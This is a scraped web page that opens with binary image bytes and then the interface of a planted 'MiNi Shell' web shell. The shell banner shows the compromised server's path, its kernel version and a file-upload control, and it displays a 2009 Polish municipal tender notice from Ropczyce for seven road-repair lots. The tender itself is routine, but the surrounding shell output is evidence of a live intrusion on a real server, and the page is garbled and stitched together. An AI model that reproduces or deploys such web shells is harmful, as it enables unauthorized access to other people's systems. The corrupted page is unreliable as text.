JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090807/271216-N-2009.html

<p class="kh_header"><b>Ropczyce: Wykonanie odbudowy infrastruktury drogowej w ramach otrzymanych środków finansowych na usuwanie skutków klęsk żywiołowych, gdzie zastosowano podział zadań. CPV 45-23-31-42-6</b><br>
<b>Numer ogłoszenia: 271216 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ropczyce , ul. Krisego 1/30, 39-100 Ropczyce, woj. podkarpackie, tel. (017) 2210550, faks (017) 2210555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ropczyce.umig.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie odbudowy infrastruktury drogowej w ramach otrzymanych środków finansowych na usuwanie skutków klęsk żywiołowych, gdzie zastosowano podział zadań. CPV 45-23-31-42-6.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane wykonywane na istniejących odcinakach dróg gminnych na łącznej długości 3210 mb polegające na przywróceniu ich do wymaganego stanu technicznego. 
Zadanie Nr 1
Remont drogi gminnej Mała - Miklosówka na długości 1000 mb
w km od  0+000  do 1+ 000 CPV 45-23-31-42-6

Zadanie Nr 2
Remont drogi gminnej Niedźwiada - Polska na odcinku o długości 750 mb w km  od 0+ 000 do 0+750              CPV 45-23-31-42-6

Zadanie Nr 3
Remont ulicy Błonie w Ropczycach  na odcinku o długości 360  mb w km od 0+000 do 0+360                         CPV 45-23-31-42-6
 
Zadanie Nr 4
Remont ulicy Rolniczej w Ropczycach na odcinku o długości 300 mb w km od 0+000 do 0+300                     CPV 45-23-31-42-6

Zadanie Nr 5
Remont drogi Ropczyce - Chechły Na Kubika na odcinku o długości 300 mb w km 0+000 do 0+300               CPV 45-23-31-42-6

Zadanie Nr 6
Remont drogi Ropczyce - Chechły Na Dobrowolskiego  na odcinku o długości 300 mb w km 0+050                 do 0+350 CPV 45-23-31-42-6

Zadanie Nr 7
Remont drogi Ropczyce - Witkowice Na Baranowskiego  na odcinku o długości 200 mb w km 0+000               do 0+200 CPV 45-23-31-42-6

1. Szczegółowy zakres i sposób wykonania robót określają przedmiary robót dla w/w zadań   oraz  szczegółowe specyfikacje techniczne wykonania i odbioru robót  stanowiące załącznik do SIWZ.
W.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu:
1. O udzielenie zamówienia mogą ubiegać się wykonawcy , którzy:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tj. osobami sprawującymi samodzielne funkcje techniczne posiadającymi stosowne do zakresu zamówienia uprawnienia do kierowania robotami budowlanymi  (branża drogowa) i należącymi do właściwej izby samorządu zawodowego, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia  potencjału technicznego i osób zdolnych do wykonani zamówienia,
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
2. Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów złożonych wraz z ofertą.
3. Wykonawca musi wykazać spełnienie każdego warunku.
4. Niespełnienie któregokolwiek warunku spowoduje wykluczenie wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty należy dołączyć:
1.Wypełniony formularz ofertowy. (Formularz ofertowy stanowi załącznik do SIWZ).
2. Kosztorysy  ofertowe - w układzie zgodnym z przedmiarami robót.
3. Oświadczenie, iż wykonawca spełnia warunki określone w art. 22 ust. 1 i nie podlega wykluczeniu                       z postępowania o zamówienia publiczne na podstawie art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych 
4. W celu potwierdzenia, iż wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, należy dołączyć następujące dokumenty:

a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  

b) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega                   z opłacaniem podatków i opłat lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

c) Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożnie na raty zaległych płatności  lub wstrzymania w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

5. Dokumenty potwierdzające 
a) posiadanie potencjału technicznego tj. 
-  wykazu niezbędnych do wykonania zamówienia, narzędzi i urządzeń, jakie posiada wykonawca lub pisemnego zobowiązania innych podmiotów do ich udostępnienia,
b) dysponowanie osobami które mają niezbędną wiedzę i doświadczenie do wykonania zamówienia oraz osoby które będą wykonywać zamówienie tj.
- wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności lub pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.(Osoba kierująca robotami winna posiadać uprawnienia budowlane     o specjalności drogowej).
-  dokumenty potwierdzające że w/w osoby mają  wymagane uprawnienia budowlane (osoba kierująca robotami winna posiadać uprawnienia budowlane o specjalności  drogowej) i przynależą do Polskiej Izby Inżynierów Budownictwa zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. Nr 89 poz. 414  z późn. zmianami). 
6. W przypadku podmiotów występujących wspólnie zobowiązani są oni przedłożyć dokument ustanawiający pełnomocnika do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www..bip.ropczyce.um.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ropczycach
ul. Krisego 1
39-100 Ropczyce
Referat.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2009 godzina 09:45, miejsce: Urząd Miejski w Ropczycach
ul. Krisego 1
39-100 Ropczyce
Sekretariat pok. Nr 208.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1
Remont drogi gminnej Mała - Miklosówka na długości 1000 mb
w km od  0+000  do 1+ 000 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zalkres robót obejmuje:
1.Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane przy użyciu równiarki samojezdnej - 2 godz
2.Górna warstwa podbudowy z kruszywa łamanego klinowanego klińcem, grubość warstwy po zagęszczeniu 15 cm - 3600 m2
3.Wyrównanie istniejącej podbudowy ( wzmocnienie) tłuczniem kamiennym wraz zaklinowaniem klińcem,  w-wa po zagęszczeniu grub. 10 cm - 450 m2
4.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości 50 kg/m2 - 366 m2
5.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno-bitumicznej, standard II, grubość warstwy po zagęszczeniu  4 cm - 3600 m2
6.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 200 m3
7.Mechaniczne oczyszczanie koparką podsiębierną o poj. łyżki do 0,4 m3 w gr. kat. IV z odwozem urobku samoch. samowył. na odległość do 1 km, rowów z namułu przy grubości do 30 cm z wyprofilowaniem dna            i skarp rowu - 1000 mb.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2
Remont drogi gminnej Niedźwiada - Polska na odcinku o długości 750 mb w km                   od 0+ 000 do0+750 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Mechaniczne oczyszczenie istniejącej nawierzchni bitumicznej - 2250 m2
2.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości 50 kg/m2 - 2300 m2
3.Mechaniczne wykonanie nawierzchni ścieralnej   z masy mineralno-bitumicznej, 
standard II, grubość warstwy po zagęszczeniu 
 4cm - 2300 m2
4.Uzupełnienie poboczy wraz z ich zagęszczeniem kruszywem naturalnym 0-31,5 mm - 30 m3
5.Mechaniczne oczyszczanie koparką podsiębierną o poj. łyżki do 0,4 m3 w gr. kat. IV z odwozem urobku samoch. samowył. na odległość do 1 km, rowów z namułu przy grubości do 30 cm z wyprofilowaniem dna            i skarp rowu - 750 mb.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3
Remont ul. Błonie w Ropczycach na odcinku o długości 360 mb w km od 0+000 do 0+360 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane przy użyciu równiarki samojezdnej - 2 godz
2.Górna warstwa podbudowy z kruszywa łamanego klinowanego klińcem, grubość warstwy po zagęszczeniu 10 cm - 1122 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną  w ilości          75 kg/m2 - 1122 m2
4.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno-bitumicznej, 
standard II, grubość warstwy po zagęszczeniu 
 4 cm - 1122 m2
5.Ręczne formowanie                               i zagęszczanie nasypów z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 38 m3.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4
Remont ul. Rolniczej w Ropczycach na odcinku o długości 300 mb w km                                od 0+000 do 0+300 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Mechaniczne oczyszczenie istniejącej nawierzchni bitumicznej - 1061 m2
2.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości          75 kg/m2 - 1061 m2
3.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno-bitumicznej, 
standard II, grubość warstwy po zagęszczeniu 
 4cm - 1061 m2
4.Uzupełnienie poboczy wraz z ich zagęszczeniem kruszywem  niesortowanym łamanym kamiennym o uziarnieniu 5/31,5 mm w-wa gr  7 cm - 180 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5
Remont drogi gminnej Ropczyce - Chechły Na Kubika na długości 300 mb
w km od  0+000  do 0+300 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane przy użyciu równiarki samojezdnej - 1 godz
2.Górna warstwa podbudowy z kruszywa łamanego klinowanego klińcem, grubość warstwy po zagęszczeniu 10 cm - 1030 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości           75 kg/m2 - 1030 m2
4.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno - bitumicznej, 
standard II, grubość warstwy po zagęszczeniu 
 4 cm - 1030 m2
5.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 15 m3
6.Ułożenie korytek ściekowych o wym. 50 x 40 x 14 na podsypce cementowo-piaskowej - 65 mb.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6
Remont drogi gminnej Ropczyce - Chechły Na Dobrowolskiego na długości 300 mb
w km od  0+050  do 0+350 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane przy użyciu równiarki samojezdnej - 1 godz.
2.Górna warstwa podbudowy z kruszywa łamanego klinowanego klińcem, grubość warstwy po zagęszczeniu 10 cm - 900 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości           50 kg/m2 - 900 m2
4Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno-bitumicznej, 
standard II, grubość warstwy po zagęszczeniu 
 4 cm - 900 m2
5.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 15 m3.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie Nr 7
Remont drogi gminnej Ropczyce - Witkowice Na Baranowskiego na długości 200 mb
w km od  0+000  do 0+200 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Ręczne oczyszczenie istniejącej nawierzchni bitumicznej z naniesionego namułu oraz zerwanej nawierzchni bitumicznej z odwozem sam. samowył. do 10 t na odl do 1 km - 725 m2
2.Dolna warstwa podbudowy z tłucznia kamiennego klinowanego klińcem , grubość w-wy po zagęszczeniu 20 cm ( uzupełnienie zniszczonej podbudowy) - 225 m2
3.Nawierzchnie z mieszanek min.bit. asfaltowych o gr. 4 cm ( warstwa wiążąca) wraz z rozjazdami na skrzyżowaniach - 950 m2
4.Nawierzchnie z mieszanek min.bit. asfaltowych  o gr. 4 cm ( warstwa ścieralna) wraz z rozjazdami na skrzyżowaniach - 950 m2
5.Oczyszczenie rowów z wyprofilowaniem dna i skarp z namułu gr. 20 cm z odwozem samoch. samowył. na odl do 1 km - 180 mb
6.Uzupełnienie poboczy wraz z ich zagęszczeniem kruszywem niesortowanym łamanym kamiennym o uziarnieniu 5/31,5 mm w-wa gr. 8 cm - 120 m2
7.Wykonanie części przelotowej przepustu z rur żelbetowych fi 50 cm na podbudowie z kruszywa kamiennego łamanego gr. w-wy           25 cm - 9 mb.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com